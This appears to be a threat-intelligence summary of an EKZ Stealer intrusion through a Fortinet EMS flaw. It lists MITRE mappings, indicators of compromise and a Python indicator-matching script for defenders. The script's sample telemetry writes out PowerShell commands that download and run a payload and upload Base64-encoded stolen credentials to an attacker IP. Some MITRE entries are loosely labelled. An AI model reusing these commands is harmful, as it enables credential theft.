Fortinet Vulnerability CVE-2026-35616 and EKZ Stealer, Attacking Obfuscating Compilers with Binary Ninja Workflows

eSentire TRU found EKZ Stealer in a customer environment after attackers exploited CVE-2026-35616 against Fortinet EMS 7.4.5–7.4.6, masquerading the payload as FortiEndpoint_Patch.exe to harvest browser credentials and exfiltrate them via PowerShell. The report also details Binary Ninja workflow techniques used to deobfuscate EKZ Stealer’s control flow and recover its indirect jumps, calls, and string decryption logic. #EKZStealer #CVE-2026-35616 #FortinetEMS #FortiEndpoint_Patch.exe #BinaryNinja

Keypoints

  • eSentire TRU detected EKZ Stealer in May 2026 inside a customer environment in the Energy, Utilities & Waste industry.
  • The intrusion leveraged CVE-2026-35616, an improper access control flaw in Fortinet EMS versions 7.4.5 through 7.4.6.
  • Attackers disguised the stealer as FortiEndpoint_Patch.exe to make it look like a Fortinet update.
  • The malware harvested credentials from Chromium-based browsers and Firefox, then wrote them to C:\ProgramData\log.txt.
  • Stolen data was Base64-encoded and exfiltrated through an HTTP POST request to 83.138.53.110 using PowerShell.
  • The article explains how Binary Ninja Workflows can deobfuscate EKZ Stealer by resolving indirect jumps, indirect calls, and control-flow flattening.
  • TRU recommends patching Fortinet EMS, restricting access to trusted networks, and reviewing EMS logs for exploitation indicators.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attackers compromised the Fortinet EMS server by exploiting CVE-2026-35616. (‘threat actors exploited CVE-2026-35616 in Fortinet EMS’)
  • [T1059.001] PowerShell – PowerShell was used to download, execute, sleep, encode data, and upload stolen credentials. (‘DownloadFile’, ‘Start-Process’, ‘Start-Sleep’, ‘UploadString’)
  • [T1005] Data from Local System – The stealer collected credentials stored on the victim host before exfiltration. (‘write stolen credentials to a file named log.txt’)
  • [T1027] Obfuscated Files or Information – The malware used compiler-based obfuscation, indirect jumps, control-flow flattening, and XOR string encryption to hinder analysis. (‘compiler-based obfuscations’, ‘control-flow flattening’, ‘XOR-based string encryption’)
  • [T1027.001] Binary Padding / Packed Obfuscated-like Content – The sample was compiled with obfuscating compiler behavior that distorted control flow and hid execution paths. (‘compiled with an obfuscating compiler that distorts control flow’)
  • [T1055] Process Injection – Not mentioned directly; no evidence in the article.
  • [T1105] Ingress Tool Transfer – The payload was downloaded from the remote host before execution. (‘downloads EKZ Infostealer’)
  • [T1041] Exfiltration Over C2 Channel – Stolen data was sent out via HTTP POST to the attacker infrastructure. (‘exfiltrating that file through an HTTP POST request’)

Indicators of Compromise

  • [IPv4] Dropper/exfiltration infrastructure used for download and POST exfiltration – 83.138.53.110, and 1 host
  • [File hash] EKZ Stealer sample distributed as FortiEndpoint_Patch.exe – 0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e
  • [File name] Default credential output file written by the stealer – C:\programdata\log.txt
  • [File name] Disguised payload filename used in the attack chain – C:\programdata\FortiEndpoint_Patch.exe
  • [Command line] EKZ Stealer invocation noted in the article – runhlp.exe –v20-decrypt
  • [URL path] Download and exfiltration endpoints on the attacker server – /dl/p.exe, /service/save.php
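As an added example (not code from the eSentire report), the following Python triage check runs the indicators listed above over endpoint telemetry; the key=value event format and the sample lines are constructed assumptions, and only the IP, URL paths, file paths, hash and PowerShell method names come from the summary.

```python
from collections import Counter

# Indicators quoted from the summary above (IP, URL paths, file paths, hash)
IOC_IP = "83.138.53.110"
IOC_URL_PATHS = ("/dl/p.exe", "/service/save.php")
IOC_FILES = {  # short tag -> full lower-case path; matching on the full path avoids false hits on any log.txt
    "fortiendpoint_patch.exe": r"c:\programdata\fortiendpoint_patch.exe",
    "log.txt": r"c:\programdata\log.txt",
}
IOC_SHA256 = "0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e"
# PowerShell cmdlets/methods the summary attributes to the download/exfiltration chain
PS_MARKERS = ("downloadfile", "start-process", "start-sleep", "uploadstring")

# Constructed sample telemetry (not real logs); one event per line, key=value fields (assumed format)
SAMPLE_EVENTS = r"""
host=ems01 proc=powershell.exe cmd="(New-Object Net.WebClient).DownloadFile('http://83.138.53.110/dl/p.exe','C:\ProgramData\FortiEndpoint_Patch.exe')"
host=ems01 proc=powershell.exe cmd="Start-Process C:\ProgramData\FortiEndpoint_Patch.exe; Start-Sleep 30"
host=ems01 proc=FortiEndpoint_Patch.exe sha256=0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e file_write=C:\ProgramData\log.txt
host=ems01 proc=powershell.exe cmd="$d=[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\ProgramData\log.txt')); (New-Object Net.WebClient).UploadString('http://83.138.53.110/service/save.php',$d)"
host=ws07 proc=msedge.exe file_write=C:\Users\bob\AppData\Local\Temp\log.txt
""".strip()


def match_indicators(event: str) -> list[str]:
    """Return the indicator tags that fire on one event line (case-insensitive substring checks)."""
    e = event.lower()
    tags = []
    if IOC_IP in e:
        tags.append("c2_ip")
    tags += [f"url_path:{p}" for p in IOC_URL_PATHS if p in e]
    tags += [f"file:{name}" for name, path in IOC_FILES.items() if path in e]
    if IOC_SHA256 in e:
        tags.append("sha256_match")
    if "powershell" in e:  # the cmdlet markers are only meaningful inside a PowerShell command line
        tags += [f"ps:{m}" for m in PS_MARKERS if m in e]
    return tags


def scan(events: str) -> dict:
    """Scan newline-separated events; return matching line numbers with their tags and a per-tag count."""
    hits, counts = {}, Counter()
    for n, line in enumerate(events.splitlines(), 1):
        tags = match_indicators(line)
        if tags:
            hits[n] = tags
            counts.update(tags)
    return {"hits": hits, "counts": dict(counts)}


if __name__ == "__main__":
    for n, tags in scan(SAMPLE_EVENTS)["hits"].items():
        print(f"line {n}: {', '.join(tags)}")
```

Lines that hit several indicator classes at once (C2 IP plus a URL path plus a staged file) are the ones worth escalating; the last sample line shows why the file match is on the full ProgramData path rather than the bare file name.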


Read more: https://www.esentire.com/blog/fortinet-vulnerability-cve-2026-35616-and-ekz-stealer-attacking-obfuscating-compilers-with-binary-ninja-workflows